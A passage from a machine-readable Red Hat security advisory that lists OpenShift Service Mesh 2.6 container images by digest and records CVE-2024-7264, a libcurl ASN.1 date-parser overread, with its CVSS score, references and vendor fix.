"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", }, product_reference: "openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64 as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x as a component of RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", relates_to_product_reference: "8Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le as a component of RHOSSM 2.6 for RHEL 9", product_id: "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", }, product_reference: "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", relates_to_product_reference: "9Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64 as a component of RHOSSM 2.6 for RHEL 9", product_id: "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", }, product_reference: "openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", relates_to_product_reference: "9Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x as a component of RHOSSM 2.6 for RHEL 9", product_id: "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", }, product_reference: "openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", relates_to_product_reference: "9Base-RHOSSM-2.6", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64 as a component of RHOSSM 2.6 for RHEL 9", product_id: "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", }, product_reference: "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", relates_to_product_reference: "9Base-RHOSSM-2.6", }, ], }, vulnerabilities: [ { cve: "CVE-2024-7264", cwe: { id: "CWE-125", name: "Out-of-bounds Read", }, discovery_date: "2024-07-31T04:33:09+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2301888", }, ], notes: [ { category: "description", text: "A flaw was found in libcurl, where libcurl's ASN1 parser code has the `GTime2str()` function, used for parsing an ASN.1 Generalized Time field. If a syntactically incorrect field is given, the parser can use -1 for the length of the *time fraction*, leading to a `strlen()` performed on a pointer to a heap buffer area that is not purposely NULL terminated.", title: "Vulnerability description", }, { category: "summary", text: "curl: libcurl: ASN.1 date parser overread", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-7264", }, { category: "external", summary: "RHBZ#2301888", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2301888", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-7264", url: "https://www.cve.org/CVERecord?id=CVE-2024-7264", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-7264", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-7264", }, { category: "external", summary: "https://www.oracle.com/security-alerts/cpuoct2024.html#AppendixMSQL", url: "https://www.oracle.com/security-alerts/cpuoct2024.html#AppendixMSQL", }, ], release_date: "2024-07-31T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:48+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x", "9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7726", }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "LOCAL", availabilityImpact: "HIGH", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "NONE", privilegesRequired: "LOW", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H", version: "3.1", }, products: [ "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x", "8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64", "8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x", 